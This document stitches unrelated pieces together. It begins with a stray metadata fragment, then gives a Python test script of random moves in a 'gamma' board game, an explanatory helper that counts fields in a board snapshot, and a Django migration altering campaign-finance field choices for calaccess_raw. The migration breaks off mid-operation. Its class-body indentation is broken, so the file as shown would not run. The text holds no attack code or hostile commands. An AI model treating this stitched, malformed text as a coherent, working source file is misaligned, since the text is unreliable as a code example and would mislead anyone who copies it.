] | 18 | 2020-03-06T17:45:13.000Z | 2020-06-09T19:18:31.000Z | from part1 import (
gamma_board,
gamma_busy_fields,
gamma_delete,
gamma_free_fields,
gamma_golden_move,
gamma_golden_possible,
gamma_move,
gamma_new,
)
"""
scenario: test_random_actions
uuid: 941166032
"""
"""
random actions, total chaos
"""
board = gamma_new(5, 4, 2, 18)
assert board is not None
assert gamma_move(board, 1, 1, 0) == 1
assert gamma_move(board, 1, 3, 0) == 1
assert gamma_move(board, 2, 0, 0) == 1
assert gamma_move(board, 2, 1, 1) == 1
assert gamma_free_fields(board, 2) == 16
assert gamma_move(board, 1, 2, 2) == 1
assert gamma_golden_move(board, 1, 0, 0) == 1
assert gamma_move(board, 2, 4, 0) == 1
assert gamma_move(board, 2, 0, 3) == 1
assert gamma_free_fields(board, 2) == 13
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 2, 4, 2) == 1
assert gamma_golden_possible(board, 2) == 1
assert gamma_move(board, 1, 2, 1) == 1
assert gamma_golden_move(board, 1, 0, 4) == 0
assert gamma_move(board, 2, 3, 3) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_free_fields(board, 2) == 10
assert gamma_move(board, 1, 1, 3) == 1
assert gamma_move(board, 1, 2, 1) == 0
assert gamma_golden_possible(board, 1) == 0
assert gamma_move(board, 2, 3, 2) == 1
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_busy_fields(board, 2) == 6
assert gamma_move(board, 1, 4, 0) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 1, 1, 1) == 0
assert gamma_move(board, 2, 2, 0) == 1
assert gamma_move(board, 1, 1, 0) == 0
assert gamma_move(board, 2, 3, 2) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_free_fields(board, 1) == 7
assert gamma_move(board, 2, 3, 4) == 0
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_move(board, 1, 3, 1) == 1
assert gamma_move(board, 2, 3, 4) == 0
assert gamma_move(board, 2, 2, 2) == 0
assert gamma_move(board, 1, 3, 4) == 0
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_busy_fields(board, 1) == 7
assert gamma_move(board, 2, 2, 1) == 0
assert gamma_move(board, 2, 4, 3) == 1
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_busy_fields(board, 1) == 7
board991565161 = gamma_board(board)
assert board991565161 is not None
assert board991565161 == ("21.22\n"
"..122\n"
".211.\n"
"11212\n")
del board991565161
board991565161 = None
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 1, 3, 1) == 0
assert gamma_free_fields(board, 1) == 5
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 1, 3, 2) == 0
assert gamma_move(board, 2, 1, 0) == 0
assert gamma_move(board, 2, 4, 3) == 0
assert gamma_free_fields(board, 2) == 5
assert gamma_move(board, 1, 2, 1) == 0
assert gamma_free_fields(board, 1) == 5
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_move(board, 1, 1, 4) == 0
assert gamma_move(board, 1, 4, 2) == 0
assert gamma_move(board, 2, 1, 4) == 0
assert gamma_move(board, 1, 1, 0) == 0
assert gamma_move(board, 1, 1, 3) == 0
assert gamma_move(board, 2, 3, 2) == 0
assert gamma_move(board, 2, 4, 0) == 0
assert gamma_busy_fields(board, 2) == 8
assert gamma_golden_possible(board, 2) == 1
assert gamma_golden_move(board, 2, 0, 1) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 1, 2, 0) == 0
assert gamma_move(board, 2, 0, 1) == 1
assert gamma_busy_fields(board, 2) == 9
assert gamma_golden_move(board, 2, 3, 1) == 1
assert gamma_move(board, 2, 2, 0) == 0
assert gamma_move(board, 2, 4, 1) == 1
assert gamma_busy_fields(board, 2) == 11
gamma_delete(board)
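The rendered-board assertion above (the `board991565161` string) can be cross-checked against the `gamma_busy_fields` assertions: each digit in the string is a field owned by that player. The helper below is not part of the original test suite; it is a small illustrative sketch showing that the snapshot taken mid-test is consistent with player 1 holding 7 fields and player 2 holding 8 at that point.

```python
def count_busy_fields(board_str):
    """Count occupied fields per player in a gamma_board() string.

    Each digit character is a field owned by that player; '.' marks
    a free field and '\n' separates rows.
    """
    counts = {}
    for ch in board_str:
        if ch.isdigit():
            counts[ch] = counts.get(ch, 0) + 1
    return counts


# The snapshot asserted in the test above:
snapshot = ("21.22\n"
            "..122\n"
            ".211.\n"
            "11212\n")
# Matches gamma_busy_fields(board, 1) == 7 and, at snapshot time,
# gamma_busy_fields(board, 2) == 8.
assert count_busy_fields(snapshot) == {"1": 7, "2": 8}
```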
# -*- coding: utf-8 -*-
# calaccess_raw/migrations/0015_auto_20170729_0218.py
# from rkiddy/django-calaccess-raw-data (MIT license)
# Generated by Django 1.11.3 on 2017-07-29 02:18
from __future__ import unicode_literals
import calaccess_raw.annotations
import calaccess_raw.fields
from django.db import migrations


class Migration(migrations.Migration):

    dependencies = [
('calaccess_raw', '0014_auto_20170421_1821'),
]
operations = [
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='entity_cd',
        field=calaccess_raw.fields.CharField(blank=True, choices=[('ATR', 'Assistant treasurer'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('OFF', 'Officer'), ('POF', 'Principal officer'), ('PRO', 'Proponent'), ('RCP', 'Recipient committee'), ('FIL', 'Unknown'), ('PEX', 'Unknown'), ('RDP', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=32), calaccess_raw.annotations.DocumentCloud(end_page=24, id='2712033-Cal-Format-1-05-02', start_page=23), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=32)], help_text='Entity code used to identify the type of entity being described within the record.', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F425', 'Form 425 (Semi-Annual Statement of No Activity (Recipient Committee)): Part 1, Committee Information'), ('F450', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 3, Committee Information'), ('F460', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Cover Page, Part 2'), ('F465', 'Form 465 (Supplemental Independent Expenditure Report): Part 5, Filing Officers')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=23), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=31)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('sen', 'Senate District'), ('SD', 'Assembly District'), ('se', 'Senate District'), ('F', 'Assembly District'), ('LBC', 'City'), ('CA', 'Statewide')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=24), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=33), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=35)], help_text='Office jurisdiction code', max_length=3),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SOUGHT'), ('H', 'HELD'), ('s', 'SOUGHT'), ('F', 'SOUGHT'), ('T', 'HELD')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=35), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=24), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=34)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('CIT', 'State Assembly Person'), ('CTL', 'State Assembly Person'), ('F', 'State Assembly Person'), ('ST', 'State Assembly Person'), ('PAC', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='cvr2campaigndisclosurecd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SUPPORT'), ('O', 'OPPOSITION'), ('s', 'SUPPORT'), ('o', 'OPPOSITION')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=41), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=35)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='cvr2lobbydisclosurecd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('EMP', 'Employer'), ('OFF', 'Officer'), ('OWN', 'Owner'), ('PTN', 'Partner')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=57), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=71)], help_text='Entity code of the entity described by the record', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr2lobbydisclosurecd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=57), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=71)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvr2registrationcd',
name='entity_cd',
        field=calaccess_raw.fields.CharField(blank=True, choices=[('AGY', 'State Agency'), ('EMP', 'Employer'), ('FRM', 'Lobbying Firm'), ('LBY', 'Lobbyist (an individual)'), ('MBR', 'Member of Association'), ('SCL', 'Subcontracted Client')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=72), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=87)], help_text='Entity code of the entity described by the record', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr2registrationcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=72), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=87)], help_text='Name of the source filing form or schedule', max_length=10),
),
migrations.AlterField(
model_name='cvr2socd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ATH', 'Authorizing individual'), ('ATR', 'Assistant treasurer'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('OFF', 'Officer'), ('POF', 'Principal officer'), ('PRO', 'Proponent'), ('SPO', 'Sponsor'), ('BMN', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=38), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=48), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=62)], help_text='Entity code of the entity described by the record.', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400 (Statement of Organization (Slate Mailer Organization)): Part 3, Individuals Who Authorize Contents Of Slate Mailers'), ('F410', 'Form 410 (Statement of Organization (Recipient Committee)): Part 4, Type of Committee')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=38), calaccess_raw.annotations.DocumentCloud(end_page=46, id='2712033-Cal-Format-1-05-02', start_page=45), calaccess_raw.annotations.DocumentCloud(end_page=59, id='2712034-Cal-Format-201', start_page=58)], help_text="Form type of the filing the record is included in. This must equal the form_type of the parent filing's cover (CVR) record.", max_length=4, verbose_name='form type'),
),
migrations.AlterField(
model_name='cvr2socd',
name='item_cd',
        field=calaccess_raw.fields.CharField(blank=True, choices=[('ATR', 'Assistant Treasurer (F410)'), ('CAO', 'Candidate/officeholder'), ('CTL', 'Controlled Committee (F410)'), ('P5B', 'Unknown'), ('PFC', 'Primarily Formed Committee Item (F410)'), ('Pfc', 'Primarily Formed Committee Item (F410)'), ('POF', 'Principal Officer (F400, F410)'), ('PRO', 'Proponent'), ('SMA', 'Slate Mailer Authorizer (F400)'), ('SPO', 'Sponsored Committee Itemization (F410)'), ('n/a', 'Not Applicable'), ('CON', 'Unknown'), ('CST', 'Unknown')], db_column='ITEM_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=48), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=62)], help_text='Section of the Statement of Organization this itemization relates to. See CAL document for the definition of legal values for this column.', max_length=4, verbose_name='item code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('FED', 'N/A'), ('JR', 'N/A')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=49), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=63)], help_text='Office jurisdiction code. See CAL document for a list of legal values.', max_length=4, verbose_name='jurisdiction code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=46), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=49), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=63)], help_text='Office sought/held code. Legal values are "S" for sought and "H" for held', max_length=1, verbose_name='office is sought or held code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('Asm', 'State Assembly Person'), ('LEG', 'State Assembly Person'), ('OF', 'State Assembly Person'), ('REP', 'State Assembly Person'), ('05', 'State Assembly Person'), ('H', 'N/A'), ('PRO', 'N/A'), ('PAC', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='cvr2socd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('O', 'OPPOSITION'), ('S', 'SUPPORT')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=46), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=40), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=49), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=64)], help_text='Support or opposition code', max_length=1, verbose_name='support or opposition code'),
),
migrations.AlterField(
model_name='cvr3verificationinfocd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ATR', 'Assistant treasurer'), ('CAO', 'Candidate/officeholder'), ('TRE', 'Treasurer'), ('OFF', 'Officer'), ('PRO', 'Proponent'), ('SPO', 'Sponsor'), ('atr', 'Treasurer'), ('tre', 'Assistant treasurer'), ('cao', 'Candidate/officeholder'), ('MDI', 'Major Donor/Ind Expenditure'), ('POF', 'Principal officer'), ('RCP', 'Recipient committee'), ('COA', 'Candidate/officeholder'), ('0', 'Unknown'), ('BBB', 'Unknown'), ('CON', 'Unknown'), ('MAI', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=25), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=11), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=34)], help_text='Entity Code', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvr3verificationinfocd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400 (Statement of Organization (Slate Mailer Organization)): Part 5, Verification'), ('F401', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Cover Page'), ('F402', 'Form 402 (Statement of Termination (Slate Mailer Organization)): Verification'), ('F410', 'Form 410 (Statement of Organization (Recipient Committee)): Part 3, Verification'), ('F425', 'Form 425 (Semi-Annual Statement of No Activity (Recipient Committee)): Part 3, Verification'), ('F450', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 4, Verification'), ('F460', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Cover Page, Part 1'), ('F461', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 4, Verification'), ('F465', 'Form 465 (Supplemental Independent Expenditure Report): Part 6, Verification'), ('F511', 'Form 511: Paid Spokesperson Report'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=50), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=64)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('BMC', 'Ballot measure committee'), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('IND', 'Individual'), ('MDI', 'Major Donor/Ind Expenditure'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('SMO', 'Slate-mailer organization')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=6), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=18), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=22)], help_text='The entity type of the filer. These codes vary by form type.', max_length=4, verbose_name='entity code'),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F511', 'Form 511: Paid Spokesperson Report'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=18), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=22)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('sen', 'Senate District'), ('Gov', 'Statewide'), ('ATT', 'Statewide'), ('CON', 'Statewide'), ('GOV', 'Statewide'), ('SOS', 'Statewide'), ('SPM', 'Statewide'), ('46', 'Assembly District'), ('55', 'Assembly District'), ('BSU', 'County'), ('CSU', 'County'), ('DAT', 'County'), ('SHC', 'County'), ('MAY', 'City'), ('CCM', 'City'), ('APP', 'Other'), ('BED', 'Other'), ('SCJ', 'Other'), ('SD', 'Other'), ('OC', 'County'), ('AD', 'Assembly District'), ('CA', 'Unknown'), ('F', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=13), calaccess_raw.annotations.DocumentCloud(end_page=22, id='2712033-Cal-Format-1-05-02', start_page=21), calaccess_raw.annotations.DocumentCloud(end_page=29, id='2712034-Cal-Format-201', start_page=28)], help_text='Office jurisdiction code', max_length=3),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SOUGHT'), ('H', 'HELD'), ('s', 'SOUGHT'), ('h', 'HELD'), ('F', 'UNKNOWN'), ('O', 'UNKNOWN')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=21), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=28)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('Gov', 'Governor'), ('Sen', 'State Senator'), ('LOC', 'Community College Board'), ('LEG', 'State Senator'), ('REP', 'State Assembly Person'), ('Mem', 'Other'), ('CIT', 'State Assembly Person'), ('PAC', 'Unknown'), ('F', 'Unknown'), ('COM', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='reportname',
field=calaccess_raw.fields.CharField(blank=True, choices=[('450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)')], db_column='REPORTNAME', documentcloud_pages=(calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=15), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=20), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=19), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=26)), help_text='Attached campaign disclosure statement type. Legal values are 450, 460, and 461.', max_length=3),
),
migrations.AlterField(
model_name='cvrcampaigndisclosurecd',
name='stmt_type',
